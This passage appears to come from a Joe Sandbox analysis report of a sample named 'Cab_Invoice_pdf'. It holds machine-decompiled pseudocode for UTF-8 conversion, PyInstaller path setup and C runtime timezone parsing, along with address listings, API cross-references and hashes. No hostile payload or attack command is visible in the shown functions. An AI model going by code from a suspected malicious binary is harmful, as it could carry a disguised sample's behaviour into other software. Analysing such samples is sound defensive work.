						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 = _t21[_t41];
							 *(_t47 + 0x30) = _t22;
							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(1);
							_push(_t7);
							_t28 = E013197F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_to_utf8");
								goto L13;
							} else {
								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
								if(__eflags == 0) {
									_push("Failed to encode wchar_t as UTF-8.\n");
									L12:
									_push("WideCharToMultiByte");
									L13:
									E01311860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L01319803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L01319803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[1]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L16;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L17;
						}
						_push("Failed to get UTF-8 buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L17:
			}

















                            0x01314a10
                            0x01314a15
                            0x01314a19
                            0x01314a1e
                            0x01314a1f
                            0x01314a24
                            0x01314a26
                            0x01314a2b
                            0x01314a35
                            0x01314a37
                            0x01314a39
                            0x01314b14
                            0x01314b16
                            0x01314b24
                            0x01314a3f
                            0x01314a43
                            0x01314a45
                            0x01314a45
                            0x01314a47
                            0x01314a50
                            0x01314a50
                            0x01314a65
                            0x01314a6f
                            0x01314a71
                            0x01314a73
                            0x00000000
                            0x00000000
                            0x01314a75
                            0x01314a78
                            0x01314a7a
                            0x01314a7b
                            0x01314a80
                            0x01314a83
                            0x01314a87
                            0x01314a89
                            0x01314ac7
                            0x01314acc
                            0x00000000
                            0x01314a8b
                            0x01314aa4
                            0x01314aa6
                            0x01314ac0
                            0x01314ad8
                            0x01314ad8
                            0x01314add
                            0x01314add
                            0x01314ae2
                            0x01314ae5
                            0x01314aeb
                            0x01314aed
                            0x01314aef
                            0x01314af1
                            0x01314af4
                            0x01314af9
                            0x01314afa
                            0x01314afd
                            0x01314afd
                            0x01314af1
                            0x01314b02
                            0x01314b0a
                            0x01314b13
                            0x01314aa8
                            0x01314aac
                            0x01314aad
                            0x01314ab1
                            0x01314ab3
                            0x01314ab6
                            0x01314ab8
                            0x00000000
                            0x01314aba
                            0x01314aba
                            0x00000000
                            0x01314aba
                            0x01314ab8
                            0x01314aa6
                            0x00000000
                            0x01314a89
                            0x01314ad3
                            0x00000000
                            0x01314ad3
                            0x01314a32
                            0x01314a32
                            0x01314a32
                            0x00000000

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A9E
                            Strings
                            • WideCharToMultiByte, xrefs: 01314AD8
                            • Failed to encode wchar_t as UTF-8., xrefs: 01314AC0
                            • Failed to get UTF-8 buffer size., xrefs: 01314AD3
                            • Out of memory., xrefs: 01314AC7
                            • win32_utils_to_utf8, xrefs: 01314ACC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: 00dcab5090623294635f8f510c44ca99a3e7dd94ccc9864fb15501394860f4df
                            • Instruction ID: 24d09bccea73a06958486961889e97851e68b99eb56601e1a8d8881c2db67000
                            • Opcode Fuzzy Hash: 00dcab5090623294635f8f510c44ca99a3e7dd94ccc9864fb15501394860f4df
                            • Instruction Fuzzy Hash: AC3182727843066BEB24AE5CAC41F5677D4EB40B1DF010139FE54B72C4E776E40483A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313370, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
                            • API String ID: 2009864989-2673223963
                            • Opcode ID: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction ID: 496f7c65bc7fced27dd958ce77e84fe30bde78c8848fef24518dbe2a0e628ded
                            • Opcode Fuzzy Hash: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction Fuzzy Hash: 4B115B72500201BBDB151B7ADC498577B9DBE8137EF0D4161FC06A320FEA21E55087F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314C90, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E01314C90(char* _a4, short* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				char* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(1);
						_t20 = E013197F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to encode wchar_t as UTF-8.\n");
								_push("WideCharToMultiByte");
								E01311860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_to_utf8");
							E01311860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get UTF-8 buffer size.\n");
						_push("WideCharToMultiByte");
						E01311860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x01314c91
                            0x01314c98
                            0x01314cf8
                            0x00000000
                            0x01314c9a
                            0x01314cb0
                            0x01314cb2
                            0x01314cb4
                            0x01314ccd
                            0x01314cd0
                            0x01314cd8
                            0x01314cda
                            0x01314cdd
                            0x01314cdf
                            0x01314cfc
                            0x01314d15
                            0x01314d17
                            0x01314d34
                            0x01314d19
                            0x01314d19
                            0x01314d1e
                            0x01314d23
                            0x01314d2b
                            0x01314d2f
                            0x01314d2f
                            0x01314ce1
                            0x01314ce1
                            0x01314ce6
                            0x01314ceb
                            0x01314cf3
                            0x01314cf7
                            0x01314cf7
                            0x01314cb6
                            0x01314cb6
                            0x01314cbb
                            0x01314cc0
                            0x01314ccc
                            0x01314ccc
                            0x01314cb4

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314D0F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction ID: 1ec15ea0bded8a1228b1423270a4caae19ab23d71fe9e0c9a6ca48847eb2c96d
                            • Opcode Fuzzy Hash: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction Fuzzy Hash: EE01F93779533676CA3161AF7C09FCB6AD9CFD1BB9F150225FA18F2288D650940282F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132AFBE, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E0132AFBE(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				void* _t80;
				signed int _t84;
				signed int _t88;
				signed int _t90;
				long _t92;
				signed int* _t95;
				signed int _t98;
				signed int _t101;
				signed int _t105;
				void* _t112;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t130;
				void* _t132;
				signed int _t133;
				signed int _t135;
				void* _t141;
				intOrPtr _t142;
				void* _t144;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int _t159;
				signed int _t162;
				intOrPtr* _t167;
				intOrPtr _t168;
				signed int _t169;
				intOrPtr* _t170;
				void* _t171;
				void* _t172;
				signed int _t173;
				int _t177;
				signed int _t179;
				char** _t180;
				signed int _t184;
				signed int _t186;
				void* _t195;
				signed int _t196;
				void* _t197;
				signed int _t198;

				_push(_t179);
				_t65 = E0132ABFC();
				_v8 = _v8 & 0x00000000;
				_t135 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t135;
				if(E0132AC5A( &_v8) != 0 || E0132AC02( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01321798();
					asm("int3");
					_t195 = _t197;
					_t198 = _t197 - 0x10;
					_push(_t135);
					_t180 = E0132ABFC();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E0132AC5A( &_v52);
					_t144 = _t179;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01321798();
						asm("int3");
						_push(_t195);
						_t196 = _t198;
						_t74 =  *0x133c008; // 0xa3433343
						_v100 = _t74 ^ _t196;
						 *0x133c91c =  *0x133c91c | 0xffffffff;
						 *0x133c910 =  *0x133c910 | 0xffffffff;
						_push(0);
						_push(_t180);
						_push(_t172);
						_t137 = "TZ";
						_t173 = 0;
						 *0x1346578 = 0;
						_t78 = E01326CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t186 = E01320A25(_t144, _v276);
								__eflags = _t186;
								if(__eflags != 0) {
									_t84 = E01326CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
									__eflags = _t84;
									if(_t84 == 0) {
										E013209EB(0);
										_t173 = _t186;
									} else {
										_push(_t186);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E013209EB();
								}
							}
						} else {
							_t173 =  &_v272;
						}
						asm("sbb esi, esi");
						_t184 =  ~(_t173 -  &_v272) & _t173;
						__eflags = _t173;
						if(_t173 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t173;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t173);
								E0132AFBE(__eflags);
							}
						}
						_t80 = E013209EB(_t184);
						__eflags = _v16 ^ _t196;
						E0131786A();
						return _t80;
					} else {
						_t88 = E0132AC02( &_v16);
						_pop(_t144);
						__eflags = _t88;
						if(_t88 != 0) {
							goto L66;
						} else {
							_t90 = E0132AC2E( &_v20);
							_pop(_t144);
							__eflags = _t90;
							if(_t90 != 0) {
								goto L66;
							} else {
								E013209EB( *0x1346574);
								 *0x1346574 = 0;
								 *_t198 = 0x1346580;
								_t92 = GetTimeZoneInformation(??);
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									_t151 =  *0x1346580 * 0x3c;
									_t169 =  *0x13465d4; // 0x0
									_push(_t172);
									 *0x1346578 = 1;
									_v12 = _t151;
									__eflags =  *0x13465c6; // 0x0
									if(__eflags != 0) {
										_t152 = _t151 + _t169 * 0x3c;
										__eflags = _t152;
										_v12 = _t152;
									}
									__eflags =  *0x134661a; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t105 =  *0x1346628; // 0x0
										__eflags = _t105;
										if(_t105 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t105 - _t169) * 0x3c;
										}
									}
									_t177 = E01327D59(0, _t169);
									_t98 = WideCharToMultiByte(_t177, 0, 0x1346584, 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
									__eflags = _t98;
									if(_t98 == 0) {
										L60:
										 *( *_t180) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t180)[0x3f] = 0;
										}
									}
									_t101 = WideCharToMultiByte(_t177, 0, 0x13465d8, 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
									__eflags = _t101;
									if(_t101 == 0) {
										L64:
										 *(_t180[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t180[1][0x3f] = 0;
										}
									}
								}
								 *(E0132ABF6()) = _v12;
								 *((intOrPtr*)(E0132ABEA())) = _v16;
								_t95 = E0132ABF0();
								 *_t95 = _v20;
								return _t95;
							}
						}
					}
				} else {
					_t170 =  *0x1346574; // 0x0
					_t179 = _a4;
					if(_t170 == 0) {
						L12:
						E013209EB(_t170);
						_t155 = _t179;
						_t12 = _t155 + 1; // 0x132b3af
						_t171 = _t12;
						do {
							_t112 =  *_t155;
							_t155 = _t155 + 1;
						} while (_t112 != 0);
						_t13 = _t155 - _t171 + 1; // 0x132b3b0
						 *0x1346574 = E01320A25(_t155 - _t171, _t13);
						_t115 = E013209EB(0);
						_t168 =  *0x1346574; // 0x0
						if(_t168 == 0) {
							goto L45;
						} else {
							_t159 = _t179;
							_push(_t172);
							_t14 = _t159 + 1; // 0x132b3af
							_t172 = _t14;
							do {
								_t116 =  *_t159;
								_t159 = _t159 + 1;
							} while (_t116 != 0);
							_t15 = _t159 - _t172 + 1; // 0x132b3b0
							_t118 = E01320A73(_t168, _t15, _t179);
							_t197 = _t197 + 0xc;
							if(_t118 != 0) {
								goto L46;
							} else {
								_t172 = 3;
								_push(_t172);
								_t119 = E013250A9(_t160,  *_t135, 0x40, _t179);
								_t197 = _t197 + 0x10;
								if(_t119 != 0) {
									goto L46;
								} else {
									while( *_t179 != 0) {
										_t179 = _t179 + 1;
										_t172 = _t172 - 1;
										if(_t172 != 0) {
											continue;
										}
										break;
									}
									_pop(_t172);
									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
									if(_t135 != 0) {
										_t179 = _t179 + 1;
									}
									_t162 = E01321594(_t160, _t179) * 0xe10;
									_v8 = _t162;
									while(1) {
										_t121 =  *_t179;
										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
											break;
										}
										_t179 = _t179 + 1;
									}
									__eflags =  *_t179 - 0x3a;
									if( *_t179 == 0x3a) {
										_t179 = _t179 + 1;
										_t162 = _v8 + E01321594(_t162, _t179) * 0x3c;
										_v8 = _t162;
										while(1) {
											_t130 =  *_t179;
											__eflags = _t130 - 0x30;
											if(_t130 < 0x30) {
												break;
											}
											__eflags = _t130 - 0x39;
											if(_t130 <= 0x39) {
												_t179 = _t179 + 1;
												__eflags = _t179;
												continue;
											}
											break;
										}
										__eflags =  *_t179 - 0x3a;
										if( *_t179 == 0x3a) {
											_t179 = _t179 + 1;
											_t162 = _v8 + E01321594(_t162, _t179);
											_v8 = _t162;
											while(1) {
												_t132 =  *_t179;
												__eflags = _t132 - 0x30;
												if(_t132 < 0x30) {
													goto L38;
												}
												__eflags = _t132 - 0x39;
												if(_t132 <= 0x39) {
													_t179 = _t179 + 1;
													__eflags = _t179;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t135;
									if(_t135 != 0) {
										_v8 = _t162;
									}
									__eflags =  *_t179;
									_t123 = 0 |  *_t179 != 0x00000000;
									_v16 = _t123;
									__eflags = _t123;
									_t124 = _v12;
									if(_t123 == 0) {
										_t29 = _t124 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										goto L44;
									} else {
										_push(3);
										_t28 = _t124 + 4; // 0xfffffddd
										_t127 = E013250A9(_t162,  *_t28, 0x40, _t179);
										_t197 = _t197 + 0x10;
										__eflags = _t127;
										if(_t127 == 0) {
											L44:
											 *(E0132ABF6()) = _v8;
											_t115 = E0132ABEA();
											 *_t115 = _v16;
											goto L45;
										} else {
											goto L46;
										}
									}
								}
							}
						}
					} else {
						_t167 = _t170;
						_t133 = _t179;
						while(1) {
							_t141 =  *_t133;
							if(_t141 !=  *_t167) {
								break;
							}
							if(_t141 == 0) {
								L8:
								_t115 = 0;
							} else {
								_t9 = _t133 + 1; // 0xdde805eb
								_t142 =  *_t9;
								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
									break;
								} else {
									_t133 = _t133 + 2;
									_t167 = _t167 + 2;
									if(_t142 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t115 == 0) {
								L45:
								return _t115;
							} else {
								_t135 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t115 = _t133 | 0x00000001;
						__eflags = _t115;
						goto L10;
					}
				}
				L82:
			}







































































                            0x0132afc7
                            0x0132afc8
                            0x0132afcd
                            0x0132afd1
                            0x0132afd3
                            0x0132afdb
                            0x0132afe6
                            0x0132b186
                            0x0132b188
                            0x0132b189
                            0x0132b18a
                            0x0132b18b
                            0x0132b18c
                            0x0132b18d
                            0x0132b192
                            0x0132b196
                            0x0132b198
                            0x0132b19b
                            0x0132b1a2
                            0x0132b1a9
                            0x0132b1ad
                            0x0132b1b0
                            0x0132b1b3
                            0x0132b1b8
                            0x0132b1b9
                            0x0132b1bb
                            0x0132b2e3
                            0x0132b2e3
                            0x0132b2e4
                            0x0132b2e5
                            0x0132b2e6
                            0x0132b2e7
                            0x0132b2e8
                            0x0132b2ed
                            0x0132b2f0
                            0x0132b2f1
                            0x0132b2f9
                            0x0132b300
                            0x0132b303
                            0x0132b310
                            0x0132b317
                            0x0132b318
                            0x0132b319
                            0x0132b31a
                            0x0132b31f
                            0x0132b32e
                            0x0132b335
                            0x0132b33d
                            0x0132b33f
                            0x0132b349
                            0x0132b34c
                            0x0132b359
                            0x0132b35c
                            0x0132b35e
                            0x0132b377
                            0x0132b37f
                            0x0132b381
                            0x0132b387
                            0x0132b38c
                            0x0132b383
                            0x0132b383
                            0x00000000
                            0x0132b383
                            0x0132b360
                            0x0132b360
                            0x0132b361
                            0x0132b361
                            0x0132b361
                            0x0132b38e
                            0x0132b341
                            0x0132b341
                            0x0132b341
                            0x0132b39b
                            0x0132b39d
                            0x0132b39f
                            0x0132b3a1
                            0x0132b3b1
                            0x0132b3b1
                            0x0132b3a3
                            0x0132b3a3
                            0x0132b3a6
                            0x00000000
                            0x0132b3a8
                            0x0132b3a8
                            0x0132b3a9
                            0x0132b3ae
                            0x0132b3a6
                            0x0132b3b7
                            0x0132b3c2
                            0x0132b3c5
                            0x0132b3cd
                            0x0132b1c1
                            0x0132b1c5
                            0x0132b1ca
                            0x0132b1cb
                            0x0132b1cd
                            0x00000000
                            0x0132b1d3
                            0x0132b1d7
                            0x0132b1dc
                            0x0132b1dd
                            0x0132b1df
                            0x00000000
                            0x0132b1e5
                            0x0132b1eb
                            0x0132b1f0
                            0x0132b1f6
                            0x0132b1fd
                            0x0132b203
                            0x0132b206
                            0x0132b20c
                            0x0132b213
                            0x0132b219
                            0x0132b21d
                            0x0132b223
                            0x0132b226
                            0x0132b22d
                            0x0132b232
                            0x0132b232
                            0x0132b234
                            0x0132b234
                            0x0132b237
                            0x0132b23e
                            0x0132b256
                            0x0132b256
                            0x0132b259
                            0x0132b240
                            0x0132b240
                            0x0132b245
                            0x0132b247
                            0x00000000
                            0x0132b249
                            0x0132b24b
                            0x0132b251
                            0x0132b251
                            0x0132b247
                            0x0132b261
                            0x0132b275
                            0x0132b27b
                            0x0132b27d
                            0x0132b28b
                            0x0132b28d
                            0x0132b27f
                            0x0132b27f
                            0x0132b282
                            0x00000000
                            0x0132b284
                            0x0132b286
                            0x0132b286
                            0x0132b282
                            0x0132b2a2
                            0x0132b2a9
                            0x0132b2ab
                            0x0132b2ba
                            0x0132b2bd
                            0x0132b2ad
                            0x0132b2ad
                            0x0132b2b0
                            0x00000000
                            0x0132b2b2
                            0x0132b2b5
                            0x0132b2b5
                            0x0132b2b0
                            0x0132b2ab
                            0x0132b2c7
                            0x0132b2d1
                            0x0132b2d6
                            0x0132b2db
                            0x0132b2e2
                            0x0132b2e2
                            0x0132b1df
                            0x0132b1cd
                            0x0132affe
                            0x0132affe
                            0x0132b004
                            0x0132b009
                            0x0132b03f
                            0x0132b040
                            0x0132b046
                            0x0132b048
                            0x0132b048
                            0x0132b04b
                            0x0132b04b
                            0x0132b04d
                            0x0132b04e
                            0x0132b054
                            0x0132b05f
                            0x0132b064
                            0x0132b069
                            0x0132b073
                            0x00000000
                            0x0132b079
                            0x0132b079
                            0x0132b07b
                            0x0132b07c
                            0x0132b07c
                            0x0132b07f
                            0x0132b07f
                            0x0132b081
                            0x0132b082
                            0x0132b089
                            0x0132b08e
                            0x0132b093
                            0x0132b098
                            0x00000000
                            0x0132b09e
                            0x0132b0a0
                            0x0132b0a1
                            0x0132b0a7
                            0x0132b0ac
                            0x0132b0b1
                            0x00000000
                            0x0132b0b7
                            0x0132b0b7
                            0x0132b0bc
                            0x0132b0bd
                            0x0132b0c0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132b0c0
                            0x0132b0c5
                            0x0132b0c6
                            0x0132b0cb
                            0x0132b0cd
                            0x0132b0cd
                            0x0132b0d5
                            0x0132b0db
                            0x0132b0de
                            0x0132b0de
                            0x0132b0e2
                            0x00000000
                            0x00000000
                            0x0132b0ec
                            0x0132b0ec
                            0x0132b0ef
                            0x0132b0f2
                            0x0132b0f4
                            0x0132b102
                            0x0132b104
                            0x0132b10e
                            0x0132b10e
                            0x0132b110
                            0x0132b112
                            0x00000000
                            0x00000000
                            0x0132b109
                            0x0132b10b
                            0x0132b10d
                            0x0132b10d
                            0x00000000
                            0x0132b10d
                            0x00000000
                            0x0132b10b
                            0x0132b114
                            0x0132b117
                            0x0132b119
                            0x0132b124
                            0x0132b126
                            0x0132b130
                            0x0132b130
                            0x0132b132
                            0x0132b134
                            0x00000000
                            0x00000000
                            0x0132b12b
                            0x0132b12d
                            0x0132b12f
                            0x0132b12f
                            0x00000000
                            0x0132b12f
                            0x00000000
                            0x0132b12d
                            0x0132b130
                            0x0132b117
                            0x0132b136
                            0x0132b136
                            0x0132b138
                            0x0132b13c
                            0x0132b13c
                            0x0132b141
                            0x0132b143
                            0x0132b146
                            0x0132b149
                            0x0132b14b
                            0x0132b14e
                            0x0132b166
                            0x0132b169
                            0x00000000
                            0x0132b150
                            0x0132b150
                            0x0132b155
                            0x0132b158
                            0x0132b15d
                            0x0132b160
                            0x0132b162
                            0x0132b16c
                            0x0132b174
                            0x0132b179
                            0x0132b17e
                            0x00000000
                            0x0132b164
                            0x00000000
                            0x0132b164
                            0x0132b162
                            0x0132b14e
                            0x0132b0b1
                            0x0132b098
                            0x0132b00b
                            0x0132b00b
                            0x0132b00d
                            0x0132b00f
                            0x0132b00f
                            0x0132b013
                            0x00000000
                            0x00000000
                            0x0132b017
                            0x0132b02b
                            0x0132b02b
                            0x0132b019
                            0x0132b019
                            0x0132b019
                            0x0132b01f
                            0x00000000
                            0x0132b021
                            0x0132b021
                            0x0132b024
                            0x0132b029
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132b029
                            0x0132b01f
                            0x0132b034
                            0x0132b036
                            0x0132b180
                            0x0132b185
                            0x0132b03c
                            0x0132b03c
                            0x00000000
                            0x0132b03c
                            0x00000000
                            0x0132b036
                            0x0132b02f
                            0x0132b031
                            0x0132b031
                            0x00000000
                            0x0132b031
                            0x0132b009
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 0132B040
                            • _free.LIBCMT ref: 0132B064
                            • _free.LIBCMT ref: 0132B1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,01346584,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,013465D8,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B3B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 16219a437e5df867b2c4742aa3259a2acdc335df800c2986807eb60fc79da7f4
                            • Instruction ID: ad1e6ccfdb1e434a41802fe5c3c720eb15ba9e5c4ffc7f115376f5ba56a64db3
                            • Opcode Fuzzy Hash: 16219a437e5df867b2c4742aa3259a2acdc335df800c2986807eb60fc79da7f4
                            • Instruction Fuzzy Hash: 2AC15A71D00325AFDB25FF7C8841AAEFBBCEF46358F14419AD99097249EB309A41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132D04A, Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E0132D04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				short* _t68;
				int _t69;
				signed int _t71;
				short* _t72;
				signed int _t75;
				short* _t85;
				int _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				signed int _t107;
				char* _t109;
				char* _t110;
				void* _t115;
				void* _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				short* _t122;
				int _t124;
				int _t126;
				short* _t127;
				intOrPtr* _t128;
				signed int _t129;
				short* _t130;

